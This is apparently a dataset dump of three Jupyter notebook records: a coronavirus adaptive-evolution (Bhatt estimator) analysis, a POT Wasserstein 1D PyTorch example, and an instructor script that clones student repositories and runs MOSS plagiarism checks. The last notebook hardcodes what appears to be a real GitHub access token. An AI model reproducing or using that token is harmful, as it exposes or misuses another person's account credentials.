"def fixation_polymorphism_score(outgroup, ingroup):\n site_type = determine_site_type(outgroup, ingroup)\n \n if site_type == None:\n Fi = float('nan')\n Pi = float('nan')\n if site_type == 1:\n Fi = 0\n Pi = 0\n elif site_type == 2:\n Fi = 1\n Pi = 0\n elif site_type in [3,5,7]:\n Fi = 0\n Pi = 1\n elif site_type == 4:\n Fi = 0.5\n Pi = 0.5\n elif site_type == 6:\n Fi = (1/3)\n Pi = (2/3)\n \n return Fi, Pi",
"_____no_output_____"
],
[
"def assign_fi_pi(outgroup_seq, ingroup_bases):\n \n #at each site, record Fi\n Fi_all = np.zeros(len(outgroup_seq))\n \n #at each site, record Pi\n Pi_all = np.zeros(len(outgroup_seq))\n \n for pos in range(len(outgroup_seq)):\n outgroup_nt = outgroup_seq[pos]\n ingroup_nts = ingroup_bases[pos]\n Fi, Pi = fixation_polymorphism_score(outgroup_nt, ingroup_nts)\n Fi_all[pos] = Fi\n Pi_all[pos] = Pi\n \n return Fi_all, Pi_all\n \n \n ",
"_____no_output_____"
],
[
"def calc_site_stats(cov, gene, window):\n #Find percent polymorphism at each site\n #Also determine whether polymorphism is silent or replacement\n input_file_outgroup = '../'+str(cov)+'/auspice/seasonal_corona_'+str(cov)+'_'+str(gene)+'_root-sequence.json'\n input_file_alignment = '../'+str(cov)+'/results/aligned_'+str(cov)+'_'+str(gene)+'.fasta'\n metafile = '../'+str(cov)+'/results/metadata_'+str(cov)+'_'+str(gene)+'.tsv'\n\n #Subset data based on time windows\n meta = pd.read_csv(metafile, sep = '\\t')\n meta.drop(meta[meta['date']=='?'].index, inplace=True)\n meta.dropna(subset=['date'], inplace=True)\n meta['year'] = meta['date'].str[:4].astype('int')\n date_range = meta['year'].max() - meta['year'].min()\n \n #Group viruses by time windows\n virus_time_subset = {}\n if window == 'all':\n years = str(meta['year'].min()) + '-' + str(meta['year'].max())\n virus_time_subset[years] = meta['strain'].tolist()\n else:\n date_window_start = meta['year'].min()\n date_window_end = meta['year'].min() + window\n while date_window_end <= meta['year'].max():\n years = str(date_window_start) + '-' + str(date_window_end)\n strains = meta[(meta['year']>=date_window_start) & (meta['year']<date_window_end)]['strain'].tolist()\n virus_time_subset[years] = strains\n #sliding window\n date_window_end += 1\n date_window_start += 1 \n \n #Find outgroup sequence\n outgroup_seq = ''\n outgroup_aa_seq = ''\n with open(input_file_outgroup, \"r\") as outgroup_handle:\n outgroup = json.load(outgroup_handle)\n outgroup_seq = SeqRecord(Seq(outgroup['nuc']))\n outgroup_aa_seq = outgroup_seq.translate()\n\n #initiate lists to record all time windows\n year_windows = []\n seqs_in_window = []\n frequency_bins = []\n fixation_scores = []\n polymorphism_scores = []\n replacement_scores = []\n silent_scores = [] \n \n #each time window separately\n for years, subset_viruses in virus_time_subset.items():\n if len(subset_viruses) != 0:\n year_windows.append(years)\n seqs_in_window.append(len(subset_viruses))\n \n freq_bins, replacement_score, ingroup_bases = walk_through_sites(outgroup_seq, outgroup_aa_seq, \n input_file_alignment, subset_viruses)\n Fi_all, Pi_all = assign_fi_pi(outgroup_seq, ingroup_bases)\n silent_score = 1-replacement_score\n \n frequency_bins.append(freq_bins)\n fixation_scores.append(Fi_all)\n polymorphism_scores.append(Pi_all)\n replacement_scores.append(replacement_score)\n silent_scores.append(silent_score)\n \n return year_windows, seqs_in_window, frequency_bins, fixation_scores, polymorphism_scores, replacement_scores, silent_scores\n \n \n",
"_____no_output_____"
],
[
"#M=rm/sm \n#not expected to vary through time provided that long-term effective population sizes remain sufficiently large\n#For each gene, calculate M by combining site count among time points\n\ndef calc_m_ratio(cov, gene):\n if gene=='spike' or gene=='s1':\n (year_windows, seqs_in_window, frequency_bins, \n fixation_scores, polymorphism_scores, replacement_scores, silent_scores) = calc_site_stats(cov, 's2', 'all')\n else:\n (year_windows, seqs_in_window, frequency_bins, \n fixation_scores, polymorphism_scores, replacement_scores, silent_scores) = calc_site_stats(cov, gene, 'all')\n \n sm = 0\n rm = 0\n \n for site in range(len(frequency_bins[0])):\n freq_bin = frequency_bins[0][site]\n if freq_bin == 'm':\n sm+= (polymorphism_scores[0][site]*silent_scores[0][site])\n rm+= (polymorphism_scores[0][site]*replacement_scores[0][site])\n \n m_ratio = rm/sm\n \n return m_ratio",
"_____no_output_____"
],
[
"def bhatt_estimators(cov, gene, window):\n (year_windows, seqs_in_window, frequency_bins, \n fixation_scores, polymorphism_scores, \n replacement_scores, silent_scores) = calc_site_stats(cov, gene, window)\n \n m_ratio = calc_m_ratio(cov, gene)\n \n #Initiate lists to store a values\n window_midpoint = []\n adaptive_substitutions = []\n \n #for each window, calculate bhatt estimators \n for years_window in range(len(frequency_bins)):\n #don't use windows with fewer than 5 sequences\n if seqs_in_window[years_window] >= 5:\n window_start = int(year_windows[years_window][0:4])\n window_end = int(year_windows[years_window][-4:])\n window_midpoint.append((window_start + window_end)/2)\n\n sf = 0\n rf = 0\n sh = 0\n rh = 0\n sm = 0\n rm = 0\n sl = 0\n rl = 0\n\n #calculate number of sites in different catagories (defined by polymorphic freq at that site)\n window_freq_bins = frequency_bins[years_window]\n for site in range(len(window_freq_bins)):\n freq_bin = window_freq_bins[site]\n #ignore sites with no polymorphisms?\n if freq_bin!='nan':\n if freq_bin == 'f':\n sf+= (fixation_scores[years_window][site]*silent_scores[years_window][site])\n rf+= (fixation_scores[years_window][site]*replacement_scores[years_window][site])\n elif freq_bin == 'h':\n sh+= (polymorphism_scores[years_window][site]*silent_scores[years_window][site])\n rh+= (polymorphism_scores[years_window][site]*replacement_scores[years_window][site])\n elif freq_bin == 'm':\n sm+= (polymorphism_scores[years_window][site]*silent_scores[years_window][site])\n rm+= (polymorphism_scores[years_window][site]*replacement_scores[years_window][site])\n elif freq_bin == 'l':\n sl+= (polymorphism_scores[years_window][site]*silent_scores[years_window][site])\n rl+= (polymorphism_scores[years_window][site]*replacement_scores[years_window][site]) \n \n# print(year_windows[years_window])\n# print(sf, rf, sh, rh, sm, rm, sl, rl) \n\n #Calculate equation 1: number of nonneutral sites\n al = rl - sl*m_ratio\n ah = rh - sh*m_ratio\n af = rf - sf*m_ratio\n #set negative a values to zero\n if al < 0:\n al = 0\n if ah < 0:\n ah = 0\n if af < 0:\n af = 0\n\n# print(al, ah, af)\n\n #Calculate the number and proportion of all fixed or high-freq sites that have undergone adaptive change\n number_adaptive_substitutions = af + ah\n adaptive_substitutions.append(number_adaptive_substitutions)\n proportion_adaptive_sites = (af + ah)/(rf +rh)\n \n # get coeffs of linear fit\n slope, intercept, r_value, p_value, std_err = stats.linregress(window_midpoint, adaptive_substitutions)\n \n ax = sns.regplot(x= window_midpoint, y=adaptive_substitutions, \n line_kws={'label':\"y={0:.1f}x+{1:.1f}\".format(slope,intercept)})\n plt.ylabel('number of adaptive substitutions')\n plt.xlabel('year')\n \n ax.legend()\n plt.show()\n ",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb01861e0e9b4d336b5cd2c214762a4b8cd61124 | 6,020 | ipynb | Jupyter Notebook | master/_downloads/cc2d1e2d3ec6e3b42bceea0b50c4db77/plot_wass1d_torch.ipynb | PythonOT/pythonot.github.io | 102512d51c24679b61bec8986806dc9063f81676 | [
"MIT"
] | 5 | 2020-06-12T10:53:15.000Z | 2021-11-06T13:21:56.000Z | master/_downloads/cc2d1e2d3ec6e3b42bceea0b50c4db77/plot_wass1d_torch.ipynb | PythonOT/pythonot.github.io | 102512d51c24679b61bec8986806dc9063f81676 | [
"MIT"
] | 1 | 2020-08-28T08:15:56.000Z | 2020-08-28T08:15:56.000Z | master/_downloads/cc2d1e2d3ec6e3b42bceea0b50c4db77/plot_wass1d_torch.ipynb | PythonOT/pythonot.github.io | 102512d51c24679b61bec8986806dc9063f81676 | [
"MIT"
] | 1 | 2020-08-28T08:08:09.000Z | 2020-08-28T08:08:09.000Z | 83.611111 | 2,103 | 0.647841 | [
[
[
"%matplotlib inline",
"_____no_output_____"
]
],
[
[
"\n# Wasserstein 1D with PyTorch\n\nIn this small example, we consider the following minization problem:\n\n\\begin{align}\\mu^* = \\min_\\mu W(\\mu,\\nu)\\end{align}\n\nwhere $\\nu$ is a reference 1D measure. The problem is handled\nby a projected gradient descent method, where the gradient is computed\nby pyTorch automatic differentiation. The projection on the simplex\nensures that the iterate will remain on the probability simplex.\n\nThis example illustrates both `wasserstein_1d` function and backend use within\nthe POT framework.\n",
"_____no_output_____"
]
],
[
[
"# Author: Nicolas Courty <[email protected]>\n# Rémi Flamary <[email protected]>\n#\n# License: MIT License\n\nimport numpy as np\nimport matplotlib.pylab as pl\nimport matplotlib as mpl\nimport torch\n\nfrom ot.lp import wasserstein_1d\nfrom ot.datasets import make_1D_gauss as gauss\nfrom ot.utils import proj_simplex\n\nred = np.array(mpl.colors.to_rgb('red'))\nblue = np.array(mpl.colors.to_rgb('blue'))\n\n\nn = 100 # nb bins\n\n# bin positions\nx = np.arange(n, dtype=np.float64)\n\n# Gaussian distributions\na = gauss(n, m=20, s=5) # m= mean, s= std\nb = gauss(n, m=60, s=10)\n\n# enforce sum to one on the support\na = a / a.sum()\nb = b / b.sum()\n\n\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\n# use pyTorch for our data\nx_torch = torch.tensor(x).to(device=device)\na_torch = torch.tensor(a).to(device=device).requires_grad_(True)\nb_torch = torch.tensor(b).to(device=device)\n\nlr = 1e-6\nnb_iter_max = 800\n\nloss_iter = []\n\npl.figure(1, figsize=(8, 4))\npl.plot(x, a, 'b', label='Source distribution')\npl.plot(x, b, 'r', label='Target distribution')\n\nfor i in range(nb_iter_max):\n # Compute the Wasserstein 1D with torch backend\n loss = wasserstein_1d(x_torch, x_torch, a_torch, b_torch, p=2)\n # record the corresponding loss value\n loss_iter.append(loss.clone().detach().cpu().numpy())\n loss.backward()\n\n # performs a step of projected gradient descent\n with torch.no_grad():\n grad = a_torch.grad\n a_torch -= a_torch.grad * lr # step\n a_torch.grad.zero_()\n a_torch.data = proj_simplex(a_torch) # projection onto the simplex\n\n # plot one curve every 10 iterations\n if i % 10 == 0:\n mix = float(i) / nb_iter_max\n pl.plot(x, a_torch.clone().detach().cpu().numpy(), c=(1 - mix) * blue + mix * red)\n\npl.legend()\npl.title('Distribution along the iterations of the projected gradient descent')\npl.show()\n\npl.figure(2)\npl.plot(range(nb_iter_max), loss_iter, lw=3)\npl.title('Evolution of the loss along iterations', fontsize=16)\npl.show()",
"_____no_output_____"
]
],
[
[
"## Wasserstein barycenter\nIn this example, we consider the following Wasserstein barycenter problem\n$$ \\\\eta^* = \\\\min_\\\\eta\\;\\;\\; (1-t)W(\\\\mu,\\\\eta) + tW(\\\\eta,\\\\nu)$$\nwhere $\\\\mu$ and $\\\\nu$ are reference 1D measures, and $t$\nis a parameter $\\in [0,1]$. The problem is handled by a project gradient\ndescent method, where the gradient is computed by pyTorch automatic differentiation.\nThe projection on the simplex ensures that the iterate will remain on the\nprobability simplex.\n\nThis example illustrates both `wasserstein_1d` function and backend use within the\nPOT framework.\n\n",
"_____no_output_____"
]
],
[
[
"device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\n# use pyTorch for our data\nx_torch = torch.tensor(x).to(device=device)\na_torch = torch.tensor(a).to(device=device)\nb_torch = torch.tensor(b).to(device=device)\nbary_torch = torch.tensor((a + b).copy() / 2).to(device=device).requires_grad_(True)\n\n\nlr = 1e-6\nnb_iter_max = 2000\n\nloss_iter = []\n\n# instant of the interpolation\nt = 0.5\n\nfor i in range(nb_iter_max):\n # Compute the Wasserstein 1D with torch backend\n loss = (1 - t) * wasserstein_1d(x_torch, x_torch, a_torch.detach(), bary_torch, p=2) + t * wasserstein_1d(x_torch, x_torch, b_torch, bary_torch, p=2)\n # record the corresponding loss value\n loss_iter.append(loss.clone().detach().cpu().numpy())\n loss.backward()\n\n # performs a step of projected gradient descent\n with torch.no_grad():\n grad = bary_torch.grad\n bary_torch -= bary_torch.grad * lr # step\n bary_torch.grad.zero_()\n bary_torch.data = proj_simplex(bary_torch) # projection onto the simplex\n\npl.figure(3, figsize=(8, 4))\npl.plot(x, a, 'b', label='Source distribution')\npl.plot(x, b, 'r', label='Target distribution')\npl.plot(x, bary_torch.clone().detach().cpu().numpy(), c='green', label='W barycenter')\npl.legend()\npl.title('Wasserstein barycenter computed by gradient descent')\npl.show()\n\npl.figure(4)\npl.plot(range(nb_iter_max), loss_iter, lw=3)\npl.title('Evolution of the loss along iterations', fontsize=16)\npl.show()",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb01aaa61151fd8b9ea21cbd7fd33c1e83130325 | 794,960 | ipynb | Jupyter Notebook | Download_Repos.ipynb | rajathkmp/COMS4995-s18 | ab3e7687ef713e11b9c674acc20ff405636aa7a6 | [
"CC0-1.0"
] | null | null | null | Download_Repos.ipynb | rajathkmp/COMS4995-s18 | ab3e7687ef713e11b9c674acc20ff405636aa7a6 | [
"CC0-1.0"
] | null | null | null | Download_Repos.ipynb | rajathkmp/COMS4995-s18 | ab3e7687ef713e11b9c674acc20ff405636aa7a6 | [
"CC0-1.0"
] | 1 | 2020-04-05T01:50:41.000Z | 2020-04-05T01:50:41.000Z | 70.487675 | 142 | 0.719658 | [
[
[
"from github import Github\nimport tqdm\n# First create a Github instance:\n\ng = Github(\"5c103d46120d27b0fac5d9d1b9df0b91c77c5d42\")\n",
"_____no_output_____"
],
[
"org = g.get_organization(\"applied-ml-spring-18\")",
"_____no_output_____"
],
[
"repos = org.get_repos()",
"_____no_output_____"
],
[
"repos_list = list(repos)",
"_____no_output_____"
],
[
"hw4 = [repo for repo in repos_list if \"homework-4\" in repo.full_name]",
"_____no_output_____"
],
[
"import os",
"_____no_output_____"
],
[
"os.chdir(\"/home/andy/Dropbox/columbia_safe/applied_machine_learning_spring_2018/submissions/\")",
"_____no_output_____"
],
[
"import shutil\nfrom os import listdir\n\n\n",
"_____no_output_____"
],
[
"for repo in tqdm.tqdm(hw4):\n #print(repo.ssh_url)\n if not os.path.exists(repo.name):\n os.system(\"git clone {}\".format(repo.ssh_url))",
"100%|██████████| 86/86 [00:00<00:00, 45423.77it/s]\n"
]
],
[
[
"## Remove empty folders",
"_____no_output_____"
]
],
[
[
"import shutil\nfrom os import listdir\nfor repo in hw4:\n try:\n l = listdir(repo.name)\n except FileNotFoundError:\n pass\n if len(l) < 2:\n # has .git folder\n shutil.rmtree(repo.name)\n",
"_____no_output_____"
]
],
[
[
"### Convert notebooks to python files",
"_____no_output_____"
]
],
[
[
"\nfrom glob import glob\n\nnotebooks = glob(\"*/*.ipynb\")",
"_____no_output_____"
],
[
"import nbconvert",
"_____no_output_____"
],
[
"import shlex\nfor notebook in tqdm.tqdm(notebooks):\n #print(notebook)\n # fixme: whitespace in names?\n if not os.path.exists(notebook.replace(\"ipynb\", \"py\")):\n os.system(\"jupyter-nbconvert {} --to script\".format(shlex.quote(notebook)))",
"100%|██████████| 109/109 [00:00<00:00, 44201.79it/s]\n"
],
[
"import mosspy\n\nuserid = 321\n\nm = mosspy.Moss(userid, \"python\")\nm.setDirectoryMode(1)\n\n\n# Submission Files\nm.addFilesByWildcard(\"*/*.py\")\n\nurl = m.send() # Submission Report URL\n\nprint (\"Report Url: \" + url)\n\n",
"Report Url: http://moss.stanford.edu/results/374137986\n"
]
],
[
[
"http://moss.stanford.edu/results/374137986\n",
"_____no_output_____"
]
],
[
[
"# Save report file\nm.saveWebPage(url, \"report2.html\")",
"_____no_output_____"
],
[
"# Download whole report locally including code diff links\nmosspy.download_report(url, \"submission2/\", connections=8, log_level=20)",
"DEBUG:root:================================================================================\nDEBUG:root:Downloading Moss Report - URL: http://moss.stanford.edu/results/374137986\nDEBUG:root:================================================================================\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match2.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match3.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match4.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match5.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match6.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match7.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match8.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match9.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match10.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match11.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match12.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match13.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match14.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match15.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match16.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match17.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match18.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match19.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match20.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match21.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match22.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match23.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match24.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match25.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match26.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match27.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match28.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match29.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match30.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match31.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match32.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match33.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match34.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match35.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match36.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match37.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match38.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match39.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match40.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match41.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match42.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match43.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match44.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match45.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match46.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match47.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match48.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match49.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match50.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match51.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match52.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match53.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match54.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match55.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match56.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match57.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match58.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match59.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match60.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match61.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match62.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match63.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match64.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match65.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match66.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match67.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match70.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match69.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match68.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match71.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match72.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match73.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match74.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match75.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match76.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match77.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match78.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match79.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match80.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match81.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match82.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match83.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match84.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match85.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match86.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match87.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match88.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match89.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match90.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match91.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match92.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match93.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match94.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match95.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match96.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match97.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match98.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match99.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match100.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match101.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match102.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match103.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match104.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match105.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match106.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match107.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match108.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match109.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match110.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match112.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match111.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match113.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match114.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match115.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match116.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match117.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match118.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match119.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match120.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match121.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match122.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match123.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match124.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match125.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match126.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match127.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match128.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match129.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match130.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match131.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match132.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match133.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match134.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match135.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match136.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match137.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match138.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match139.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match140.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match141.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match142.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match143.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match144.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match145.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match146.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match147.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match148.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match152.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match150.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match151.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match149.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match153.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match154.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match155.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match156.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match157.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match158.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match159.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match160.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match161.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match162.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match163.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match164.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match165.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match166.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match167.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match168.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match169.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match170.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match171.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match172.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match173.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match174.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match175.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match176.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match177.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match178.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match179.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match180.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match181.html\nDEBUG:root:Processing URL: 